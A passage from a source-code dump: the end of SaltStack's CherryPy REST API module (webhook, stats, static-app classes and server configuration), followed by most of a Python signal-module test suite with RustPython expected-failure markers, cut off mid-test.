{}).get('X-My-Secret-Key') %} {% set build = data.get('post', {}) %} {% if secret_key == 'F0fAgoQjIT@W' and build.result == True %} deploy_my_app: cmd.state.sls: - tgt: 'application*' - arg: - myapp.deploy - kwarg: pillar: revision: {{ revision }} {% endif %} ''' tag = '/'.join(itertools.chain(self.tag_base, args)) data = cherrypy.serving.request.unserialized_data raw_body = cherrypy.serving.request.raw_body headers = dict(cherrypy.request.headers) ret = self.event.fire_event({ 'body': raw_body, 'post': data, 'headers': headers, }, tag) return {'success': ret} class Stats(object): ''' Expose statistics on the running CherryPy server ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self): ''' Return a dump of statistics collected from the CherryPy server .. http:get:: /stats :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| ''' if hasattr(logging, 'statistics'): return cpstats.extrapolate_statistics(logging.statistics) return {} class App(object): ''' Class to serve HTML5 apps ''' exposed = True def GET(self, *args): ''' Serve a single static file ignoring the remaining path This is useful in combination with a browser-based app using the HTML5 history API. .. http::get:: /app :reqheader X-Auth-Token: |req_token| :status 200: |200| :status 401: |401| ''' apiopts = cherrypy.config['apiopts'] return cherrypy.lib.static.serve_file(apiopts['app']) class API(object): ''' Collect configuration and URL map for building the CherryPy app ''' url_map = { 'index': LowDataAdapter, 'login': Login, 'logout': Logout, 'minions': Minions, 'run': Run, 'jobs': Jobs, 'keys': Keys, 'events': Events, 'stats': Stats, } def _setattr_url_map(self): ''' Set an attribute on the local instance for each key/val in url_map CherryPy uses class attributes to resolve URLs. ''' for url, cls in six.iteritems(self.url_map): setattr(self, url, cls()) def _update_url_map(self): ''' Assemble any dynamic or configurable URLs ''' if HAS_WEBSOCKETS: self.url_map.update({ 'ws': WebsocketEndpoint, }) # Allow the Webhook URL to be overridden from the conf. self.url_map.update({ self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook, }) # Enable the single-page JS app URL. if 'app' in self.apiopts: self.url_map.update({ self.apiopts.get('app_path', 'app').lstrip('/'): App, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.apiopts = cherrypy.config['apiopts'] self._update_url_map() self._setattr_url_map() def get_conf(self): ''' Combine the CherryPy configuration with the rest_cherrypy config values pulled from the master config and return the CherryPy configuration ''' conf = { 'global': { 'server.socket_host': self.apiopts.get('host', '0.0.0.0'), 'server.socket_port': self.apiopts.get('port', 8000), 'server.thread_pool': self.apiopts.get('thread_pool', 100), 'server.socket_queue_size': self.apiopts.get('queue_size', 30), 'engine.timeout_monitor.on': self.apiopts.get( 'expire_responses', True), 'max_request_body_size': self.apiopts.get( 'max_request_body_size', 1048576), 'debug': self.apiopts.get('debug', False), }, '/': { 'request.dispatch': cherrypy.dispatch.MethodDispatcher(), 'tools.trailing_slash.on': True, 'tools.gzip.on': True, 'tools.cpstats.on': self.apiopts.get('collect_stats', False), 'tools.html_override.on': True, 'tools.cors_tool.on': True, }, } if 'favicon' in self.apiopts: conf['/favicon.ico'] = { 'tools.staticfile.on': True, 'tools.staticfile.filename': self.apiopts['favicon'], } if self.apiopts.get('debug', False) is False: conf['global']['environment'] = 'production' # Serve static media if the directory has been set in the configuration if 'static' in self.apiopts: conf[self.apiopts.get('static_path', '/static')] = { 'tools.staticdir.on': True, 'tools.staticdir.dir': self.apiopts['static'], } # Add to global config cherrypy.config.update(conf['global']) return conf def get_app(opts): ''' Returns a WSGI app and a configuration dictionary ''' apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts # Add Salt and salt-api config options to the main CherryPy config dict cherrypy.config['saltopts'] = opts cherrypy.config['apiopts'] = apiopts root = API() # cherrypy app cpyopts = root.get_conf() # cherrypy app opts return root, apiopts, cpyopts
test_signal.py
import errno import os import random import signal import socket import statistics import subprocess import sys import threading import time import unittest from test import support from test.support.script_helper import assert_python_ok, spawn_python try: import _testcapi except ImportError: _testcapi = None class GenericTests(unittest.TestCase): def test_enums(self): for name in dir(signal): sig = getattr(signal, name) if name in {'SIG_DFL', 'SIG_IGN'}: self.assertIsInstance(sig, signal.Handlers) elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}: self.assertIsInstance(sig, signal.Sigmasks) elif name.startswith('SIG') and not name.startswith('SIG_'): self.assertIsInstance(sig, signal.Signals) elif name.startswith('CTRL_'): self.assertIsInstance(sig, signal.Signals) self.assertEqual(sys.platform, "win32") @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class PosixTests(unittest.TestCase): def trivial_signal_handler(self, *args): pass # TODO: RUSTPYTHON @unittest.expectedFailure def test_out_of_range_signal_number_raises_error(self): self.assertRaises(ValueError, signal.getsignal, 4242) self.assertRaises(ValueError, signal.signal, 4242, self.trivial_signal_handler) self.assertRaises(ValueError, signal.strsignal, 4242) def test_setting_signal_handler_to_none_raises_error(self): self.assertRaises(TypeError, signal.signal, signal.SIGUSR1, None) def test_getsignal(self): hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler) self.assertIsInstance(hup, signal.Handlers) self.assertEqual(signal.getsignal(signal.SIGHUP), self.trivial_signal_handler) signal.signal(signal.SIGHUP, hup) self.assertEqual(signal.getsignal(signal.SIGHUP), hup) # TODO: RUSTPYTHON @unittest.expectedFailure def test_strsignal(self): self.assertIn("Interrupt", signal.strsignal(signal.SIGINT)) self.assertIn("Terminated", signal.strsignal(signal.SIGTERM)) self.assertIn("Hangup", signal.strsignal(signal.SIGHUP)) # TODO: RUSTPYTHON @unittest.expectedFailure # Issue 3864, unknown if this affects earlier versions of freebsd also def test_interprocess_signal(self): dirname = os.path.dirname(__file__) script = os.path.join(dirname, 'signalinterproctester.py') assert_python_ok(script) # TODO: RUSTPYTHON @unittest.expectedFailure def test_valid_signals(self): s = signal.valid_signals() self.assertIsInstance(s, set) self.assertIn(signal.Signals.SIGINT, s) self.assertIn(signal.Signals.SIGALRM, s) self.assertNotIn(0, s) self.assertNotIn(signal.NSIG, s) self.assertLess(len(s), signal.NSIG) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(sys.executable, "sys.executable required.") def test_keyboard_interrupt_exit_code(self): """KeyboardInterrupt triggers exit via SIGINT.""" process = subprocess.run( [sys.executable, "-c", "import os, signal, time\n" "os.kill(os.getpid(), signal.SIGINT)\n" "for _ in range(999): time.sleep(0.01)"], stderr=subprocess.PIPE) self.assertIn(b"KeyboardInterrupt", process.stderr) self.assertEqual(process.returncode, -signal.SIGINT) # Caveat: The exit code is insufficient to guarantee we actually died # via a signal. POSIX shells do more than look at the 8 bit value. # Writing an automation friendly test of an interactive shell # to confirm that our process died via a SIGINT proved too complex. @unittest.skipUnless(sys.platform == "win32", "Windows specific") class WindowsSignalTests(unittest.TestCase): # TODO: RUSTPYTHON @unittest.expectedFailure def test_valid_signals(self): s = signal.valid_signals() self.assertIsInstance(s, set) self.assertGreaterEqual(len(s), 6) self.assertIn(signal.Signals.SIGINT, s) self.assertNotIn(0, s) self.assertNotIn(signal.NSIG, s) self.assertLess(len(s), signal.NSIG) # TODO: RUSTPYTHON @unittest.expectedFailure def test_issue9324(self): # Updated for issue #10003, adding SIGBREAK handler = lambda x, y: None checked = set() for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM): # Set and then reset a handler for signals that work on windows. # Issue #18396, only for signals without a C-level handler. if signal.getsignal(sig) is not None: signal.signal(sig, signal.signal(sig, handler)) checked.add(sig) # Issue #18396: Ensure the above loop at least tested *something* self.assertTrue(checked) with self.assertRaises(ValueError): signal.signal(-1, handler) with self.assertRaises(ValueError): signal.signal(7, handler) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(sys.executable, "sys.executable required.") def test_keyboard_interrupt_exit_code(self): """KeyboardInterrupt triggers an exit using STATUS_CONTROL_C_EXIT.""" # We don't test via os.kill(os.getpid(), signal.CTRL_C_EVENT) here # as that requires setting up a console control handler in a child # in its own process group. Doable, but quite complicated. (see # @eryksun on https://github.com/python/cpython/pull/11862) process = subprocess.run( [sys.executable, "-c", "raise KeyboardInterrupt"], stderr=subprocess.PIPE) self.assertIn(b"KeyboardInterrupt", process.stderr) STATUS_CONTROL_C_EXIT = 0xC000013A self.assertEqual(process.returncode, STATUS_CONTROL_C_EXIT) class WakeupFDTests(unittest.TestCase): def test_invalid_call(self): # First parameter is positional-only with self.assertRaises(TypeError): signal.set_wakeup_fd(signum=signal.SIGINT) # warn_on_full_buffer is a keyword-only parameter with self.assertRaises(TypeError): signal.set_wakeup_fd(signal.SIGINT, False) def test_invalid_fd(self): fd = support.make_bad_fd() self.assertRaises((ValueError, OSError), signal.set_wakeup_fd, fd) # TODO: RUSTPYTHON if sys.platform == "win32": test_invalid_fd = unittest.expectedFailure(test_invalid_fd) def test_invalid_socket(self): sock = socket.socket() fd = sock.fileno() sock.close() self.assertRaises((ValueError, OSError), signal.set_wakeup_fd, fd) # TODO: RUSTPYTHON if sys.platform == "win32": test_invalid_socket = unittest.expectedFailure(test_invalid_socket) def test_set_wakeup_fd_result(self): r1, w1 = os.pipe() self.addCleanup(os.close, r1) self.addCleanup(os.close, w1) r2, w2 = os.pipe() self.addCleanup(os.close, r2) self.addCleanup(os.close, w2) if hasattr(os, 'set_blocking'): os.set_blocking(w1, False) os.set_blocking(w2, False) signal.set_wakeup_fd(w1) self.assertEqual(signal.set_wakeup_fd(w2), w1) self.assertEqual(signal.set_wakeup_fd(-1), w2) self.assertEqual(signal.set_wakeup_fd(-1), -1) # TODO: RUSTPYTHON if sys.platform == "win32": test_set_wakeup_fd_result = unittest.expectedFailure(test_set_wakeup_fd_result) def test_set_wakeup_fd_socket_result(self): sock1 = socket.socket() self.addCleanup(sock1.close) sock1.setblocking(False) fd1 = sock1.fileno() sock2 = socket.socket() self.addCleanup(sock2.close) sock2.setblocking(False) fd2 = sock2.fileno() signal.set_wakeup_fd(fd1) self.assertEqual(signal.set_wakeup_fd(fd2), fd1) self.assertEqual(signal.set_wakeup_fd(-1), fd2) self.assertEqual(signal.set_wakeup_fd(-1), -1) # TODO: RUSTPYTHON if sys.platform == "win32": test_set_wakeup_fd_socket_result = unittest.expectedFailure(test_set_wakeup_fd_socket_result) # On Windows, files are always blocking and Windows does not provide a # function to test if a socket is in non-blocking mode. @unittest.skipIf(sys.platform == "win32", "tests specific to POSIX") def test_set_wakeup_fd_blocking(self): rfd, wfd = os.pipe() self.addCleanup(os.close, rfd) self.addCleanup(os.close, wfd) # fd must be non-blocking os.set_blocking(wfd, True) with self.assertRaises(ValueError) as cm: signal.set_wakeup_fd(wfd) self.assertEqual(str(cm.exception), "the fd %s must be in non-blocking mode" % wfd) # non-blocking is ok os.set_blocking(wfd, False) signal.set_wakeup_fd(wfd) signal.set_wakeup_fd(-1) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class WakeupSignalTests(unittest.TestCase): @unittest.skipIf(_testcapi is None, 'need _testcapi') def check_wakeup(self, test_body, *signals, ordered=True): # use a subprocess to have only one thread code = """if 1: import _testcapi import os import signal import struct signals = {!r} def handler(signum, frame): pass def check_signum(signals): data = os.read(read, len(signals)+1) raised = struct.unpack('%uB' % len(data), data) if not {!r}: raised = set(raised) signals = set(signals) if raised != signals: raise Exception("%r != %r" % (raised, signals)) {} signal.signal(signal.SIGALRM, handler) read, write = os.pipe() os.set_blocking(write, False) signal.set_wakeup_fd(write) test() check_signum(signals) os.close(read) os.close(write) """.format(tuple(map(int, signals)), ordered, test_body) assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_wakeup_write_error(self): # Issue #16105: write() errors in the C signal handler should not # pass silently. # Use a subprocess to have only one thread. code = """if 1: import _testcapi import errno import os import signal import sys from test.support import captured_stderr def handler(signum, frame): 1/0 signal.signal(signal.SIGALRM, handler) r, w = os.pipe() os.set_blocking(r, False) # Set wakeup_fd a read-only file descriptor to trigger the error signal.set_wakeup_fd(r) try: with captured_stderr() as err: signal.raise_signal(signal.SIGALRM) except ZeroDivisionError: # An ignored exception should have been printed out on stderr err = err.getvalue() if ('Exception ignored when trying to write to the signal wakeup fd' not in err): raise AssertionError(err) if ('OSError: [Errno %d]' % errno.EBADF) not in err: raise AssertionError(err) else: raise AssertionError("ZeroDivisionError not raised") os.close(r) os.close(w) """ r, w = os.pipe() try: os.write(r, b'x') except OSError: pass else: self.skipTest("OS doesn't report write() error on the read end of a pipe") finally: os.close(r) os.close(w) assert_python_ok('-c', code) def test_wakeup_fd_early(self): self.check_wakeup("""def test(): import select import time TIMEOUT_FULL = 10 TIMEOUT_HALF = 5 class InterruptSelect(Exception): pass def handler(signum, frame): raise InterruptSelect signal.signal(signal.SIGALRM, handler) signal.alarm(1) # We attempt to get a signal during the sleep, # before select is called try: select.select([], [], [], TIMEOUT_FULL) except InterruptSelect: pass else: raise Exception("select() was not interrupted") before_time = time.monotonic() select.select([read], [], [], TIMEOUT_FULL) after_time = time.monotonic() dt = after_time - before_time if dt >= TIMEOUT_HALF: raise Exception("%s >= %s" % (dt, TIMEOUT_HALF)) """, signal.SIGALRM) def test_wakeup_fd_during(self): self.check_wakeup("""def test(): import select import time TIMEOUT_FULL = 10 TIMEOUT_HALF = 5 class InterruptSelect(Exception): pass def handler(signum, frame): raise InterruptSelect signal.signal(signal.SIGALRM, handler) signal.alarm(1) before_time = time.monotonic() # We attempt to get a signal during the select call try: select.select([read], [], [], TIMEOUT_FULL) except InterruptSelect: pass else: raise Exception("select() was not interrupted") after_time = time.monotonic() dt = after_time - before_time if dt >= TIMEOUT_HALF: raise Exception("%s >= %s" % (dt, TIMEOUT_HALF)) """, signal.SIGALRM) def test_signum(self): self.check_wakeup("""def test(): signal.signal(signal.SIGUSR1, handler) signal.raise_signal(signal.SIGUSR1) signal.raise_signal(signal.SIGALRM) """, signal.SIGUSR1, signal.SIGALRM) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pending(self): self.check_wakeup("""def test(): signum1 = signal.SIGUSR1 signum2 = signal.SIGUSR2 signal.signal(signum1, handler) signal.signal(signum2, handler) signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2)) signal.raise_signal(signum1) signal.raise_signal(signum2) # Unblocking the 2 signals calls the C signal handler twice signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2)) """, signal.SIGUSR1, signal.SIGUSR2, ordered=False) @unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair') class WakeupSocketSignalTests(unittest.TestCase): @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_socket(self): # use a subprocess to have only one thread code = """if 1: import signal import socket import struct import _testcapi signum = signal.SIGINT signals = (signum,) def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() write.setblocking(False) signal.set_wakeup_fd(write.fileno()) signal.raise_signal(signum) data = read.recv(1) if not data: raise Exception("no signum written") raised = struct.unpack('B', data) if raised != signals: raise Exception("%r != %r" % (raised, signals)) read.close() write.close() """ assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_send_error(self): # Use a subprocess to have only one thread. if os.name == 'nt': action = 'send' else: action = 'write' code = """if 1: import errno import signal import socket import sys import time import _testcapi from test.support import captured_stderr signum = signal.SIGINT def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() read.setblocking(False) write.setblocking(False) signal.set_wakeup_fd(write.fileno()) # Close sockets: send() will fail read.close() write.close() with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if ('Exception ignored when trying to {action} to the signal wakeup fd' not in err): raise AssertionError(err) """.format(action=action) assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_warn_on_full_buffer(self): # Use a subprocess to have only one thread. if os.name == 'nt': action = 'send' else: action = 'write' code = """if 1: import errno import signal import socket import sys import time import _testcapi from test.support import captured_stderr signum = signal.SIGINT # This handler will be called, but we intentionally won't read from # the wakeup fd. def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() # Fill the socketpair buffer if sys.platform == 'win32': # bpo-34130: On Windows, sometimes non-blocking send fails to fill # the full socketpair buffer, so use a timeout of 50 ms instead. write.settimeout(0.050) else: write.setblocking(False) # Start with large chunk size to reduce the # number of send needed to fill the buffer. written = 0 for chunk_size in (2 ** 16, 2 ** 8, 1): chunk = b"x" * chunk_size try: while True: write.send(chunk) written += chunk_size except (BlockingIOError, socket.timeout): pass print(f"%s bytes written into the socketpair" % written, flush=True) write.setblocking(False) try: write.send(b"x") except BlockingIOError: # The socketpair buffer seems full pass else: raise AssertionError("%s bytes failed to fill the socketpair " "buffer" % written) # By default, we get a warning when a signal arrives msg = ('Exception ignored when trying to {action} ' 'to the signal wakeup fd') signal.set_wakeup_fd(write.fileno()) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("first set_wakeup_fd() test failed, " "stderr: %r" % err) # And also if warn_on_full_buffer=True signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) " "test failed, stderr: %r" % err) # But not if warn_on_full_buffer=False signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if err != "": raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) " "test failed, stderr: %r" % err) # And then check the default again, to make sure warn_on_full_buffer # settings don't leak across calls. signal.set_wakeup_fd(write.fileno()) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("second set_wakeup_fd() test failed, " "stderr: %r" % err) """.format(action=action) assert_python_ok('-c', code) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class SiginterruptTest(unittest.TestCase): def readpipe_interrupted(self, interrupt): """Perform a read during which a signal will arrive. Return True if the read is interrupted by the signal and raises an exception. Return False if it returns normally. """ # use a subprocess to have only one thread, to have a timeout on the # blocking read and to not touch signal handling in this process code = """if 1: import errno import os import signal import sys interrupt = %r r, w = os.pipe() def handler(signum, frame): 1 / 0 signal.signal(signal.SIGALRM, handler) if interrupt is not None: signal.siginterrupt(signal.SIGALRM, interrupt) print("ready") sys.stdout.flush() # run the test twice try: for loop in range(2): # send a SIGALRM in a second (during the read) signal.alarm(1) try: # blocking call: read from a pipe without data os.read(r, 1) except ZeroDivisionError: pass else: sys.exit(2) sys.exit(3) finally: os.close(r) os.close(w) """ % (interrupt,) with spawn_python('-c', code) as process: try: # wait until the child process is loaded and has started first_line = process.stdout.readline() stdout, stderr = process.communicate(timeout=5.0) except subprocess.TimeoutExpired: process.kill() return False else: stdout = first_line + stdout exitcode = process.wait() if exitcode not in (2, 3): raise Exception("Child error (exit code %s): %r" % (exitcode, stdout)) return (exitcode == 3) # TODO: RUSTPYTHON @unittest.expectedFailure def test_without_siginterrupt(self): # If a signal handler is installed and siginterrupt is not called # at all, when that signal arrives, it interrupts a syscall that's in # progress. interrupted = self.readpipe_interrupted(None) self.assertTrue(interrupted) # TODO: RUSTPYTHON @unittest.expectedFailure def test_siginterrupt_on(self): # If a signal handler is installed and siginterrupt is called with # a true value for the second argument, when that signal arrives, it # interrupts a syscall that's in progress. interrupted = self.readpipe_interrupted(True) self.assertTrue(interrupted) def test_siginterrupt_off(self): # If a signal handler is installed and siginterrupt is called with # a false value for the second argument, when that signal arrives, it # does not interrupt a syscall that's in progress. interrupted = self.readpipe_interrupted(False) self.assertFalse(interrupted) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class ItimerTest(unittest.TestCase): def setUp(self): self.hndl_called = False self.hndl_count = 0 self.itimer = None self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm) def tearDown(self): signal.signal(signal.SIGALRM, self.old_alarm) if self.itimer is not None: # test_itimer_exc doesn't change this attr # just ensure that itimer is stopped signal.setitimer(self.itimer, 0) def sig_alrm(self, *args): self.hndl_called = True def sig_vtalrm(self, *args): self.hndl_called = True if self.hndl_count > 3: # it shouldn't be here, because it should have been disabled. raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL " "timer.") elif self.hndl_count == 3: # disable ITIMER_VIRTUAL, this function shouldn't be called anymore signal.setitimer(signal.ITIMER_VIRTUAL, 0) self.hndl_count += 1 def sig_prof(self, *args): self.hndl_called = True signal.setitimer(signal.ITIMER_PROF, 0) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_exc(self): # XXX I'm assuming -1 is an invalid itimer, but maybe some platform # defines it ? self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0) # Negative times are treated as zero on some platforms. if 0: self.assertRaises(signal.ItimerError, signal.setitimer, signal.ITIMER_REAL, -1) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_real(self): self.itimer = signal.ITIMER_REAL signal.setitimer(self.itimer, 1.0) signal.pause() self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure # Issue 3864, unknown if this affects earlier versions of freebsd also @unittest.skipIf(sys.platform in ('netbsd5',), 'itimer not reliable (does not mix well with threading) on some BSDs.') def test_itimer_virtual(self): self.itimer = signal.ITIMER_VIRTUAL signal.signal(signal.SIGVTALRM, self.sig_vtalrm) signal.setitimer(self.itimer, 0.3, 0.2) start_time = time.monotonic() while time.monotonic() - start_time < 60.0: # use up some virtual time by doing real work _ = pow(12345, 67890, 10000019) if signal.getitimer(self.itimer) == (0.0, 0.0): break # sig_vtalrm handler stopped this itimer else: # Issue 8424 self.skipTest("timeout: likely cause: machine too slow or load too " "high") # virtual itimer should be (0.0, 0.0) now self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0)) # and the handler should have been called self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_prof(self): self.itimer = signal.ITIMER_PROF signal.signal(signal.SIGPROF, self.sig_prof) signal.setitimer(self.itimer, 0.2, 0.2) start_time = time.monotonic() while time.monotonic() - start_time < 60.0: # do some work _ = pow(12345, 67890, 10000019) if signal.getitimer(self.itimer) == (0.0, 0.0): break # sig_prof handler stopped this itimer else: # Issue 8424 self.skipTest("timeout: likely cause: machine too slow or load too " "high") # profiling itimer should be (0.0, 0.0) now self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0)) # and the handler should have been called self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure def test_setitimer_tiny(self): # bpo-30807: C setitimer() takes a microsecond-resolution interval. # Check that float -> timeval conversion doesn't round # the interval down to zero, which would disable the timer. self.itimer = signal.ITIMER_REAL signal.setitimer(self.itimer, 1e-6) time.sleep(1) self.assertEqual(self.hndl_called, True) class PendingSignalsTests(unittest.TestCase): """ Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait() functions. """ @unittest.skipUnless(hasattr(signal, 'sigpending'), 'need signal.sigpending()') def test_sigpending_empty(self): self.assertEqual(signal.sigpending(), set()) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') @unittest.skipUnless(hasattr(signal, 'sigpending'), 'need signal.sigpending()') def test_sigpending(self): code = """if 1: import os import signal def handler(signum, frame): 1/0 signum = signal.SIGUSR1 signal.signal(signum, handler) signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) os.kill(os.getpid(), signum) pending = signal.sigpending() for sig in pending: assert isinstance(sig, signal.Signals), repr(pending) if pending != {signum}: raise Exception('%s != {%s}' % (pending, signum)) try: signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_kill'), 'need signal.pthread_kill()') def test_pthread_kill(self): code = """if 1: import signal import threading import sys signum = signal.SIGUSR1 def handler(signum, frame): 1/0 signal.signal(signum, handler) tid = threading.get_ident() try: signal.pthread_kill(tid, signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def wait_helper(self, blocked, test): """ test: body of the "def test(signum):" function. blocked: number of the blocked signal """ code = '''if 1: import signal import sys from signal import Signals def handler(signum, frame): 1/0 %s blocked = %s signum = signal.SIGALRM # child: block and wait the signal try: signal.signal(signum, handler) signal.pthread_sigmask(signal.SIG_BLOCK, [blocked]) # Do the tests test(signum) # The handler must not be called on unblock try: signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked]) except ZeroDivisionError: print("the signal handler has been called", file=sys.stderr) sys.exit(1) except BaseException as err: print("error: {}".format(err), file=sys.stderr) sys.stderr.flush() sys.exit(1) ''' % (test.strip(), blocked) # sig*wait* must be called with the signal blocked: since the current # process might have several threads running, use a subprocess to have # a single thread. assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'sigwait'), 'need signal.sigwait()') def test_sigwait(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) received = signal.sigwait([signum]) assert isinstance(received, signal.Signals), received if received != signum: raise Exception('received %s, not %s' % (received, signum)) ''') @unittest.skipUnless(hasattr(signal, 'sigwaitinfo'), 'need signal.sigwaitinfo()') def test_sigwaitinfo(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) info = signal.sigwaitinfo([signum]) if info.si_signo != signum: raise Exception("info.si_signo != %s" % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) info = signal.sigtimedwait([signum], 10.1000) if info.si_signo != signum: raise Exception('info.si_signo != %s' % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_poll(self): # check that polling with sigtimedwait works self.wait_helper(signal.SIGALRM, ''' def test(signum): import os os.kill(os.getpid(), signum) info = signal.sigtimedwait([signum], 0) if info.si_signo != signum: raise Exception('info.si_signo != %s' % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_timeout(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): received = signal.sigtimedwait([signum], 1.0) if received is not None: raise Exception("received=%r" % (received,)) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_negative_timeout(self): signum = signal.SIGALRM self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0) @unittest.skipUnless(hasattr(signal, 'sigwait'), 'need signal.sigwait()') @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_sigwait_thread(self): # Check that calling sigwait() from a thread doesn't suspend the whole # process. A new interpreter is spawned to avoid problems when mixing # threads and fork(): only async-safe functions are allowed between # fork() and exec(). assert_python_ok("-c", """if True: import os, threading, sys, time, signal # the default handler terminates the process signum = signal.SIGUSR1 def kill_later(): # wait until the main thread is waiting in sigwait() time.sleep(1) os.kill(os.getpid(), signum) # the signal must be blocked by all the threads signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) killer = threading.Thread(target=kill_later) killer.start() received = signal.sigwait([signum]) if received != signum: print("sigwait() received %s, not %s" % (received, signum), file=sys.stderr) sys.exit(1) killer.join() # unblock the signal, which should have been cleared by sigwait() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) """) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask_arguments(self): self.assertRaises(TypeError, signal.pthread_sigmask) self.assertRaises(TypeError, signal.pthread_sigmask, 1) self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3) self.assertRaises(OSError, signal.pthread_sigmask, 1700, []) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG]) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [0]) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000]) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask_valid_signals(self): s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals()) self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s) # Get current blocked set s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals()) self.assertLessEqual(s, signal.valid_signals()) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask(self): code = """if 1: import signal import os; import threading def handler(signum, frame): 1/0 def kill(signum): os.kill(os.getpid(), signum) def check_mask(mask): for sig in mask: assert isinstance(sig, signal.Signals), repr(sig) def read_sigmask(): sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, []) check_mask(sigmask) return sigmask signum = signal.SIGUSR1 # Install our signal handler old_handler = signal.signal(signum, handler) # Unblock SIGUSR1 (and copy the old mask) to test our signal handler old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) check_mask(old_mask) try: kill(signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") # Block and then raise SIGUSR1. The signal is blocked: the signal # handler is not called, and the signal is now pending mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) check_mask(mask) kill(signum) # Check the new mask blocked = read_sigmask() check_mask(blocked) if signum not in blocked: raise Exception("%s not in 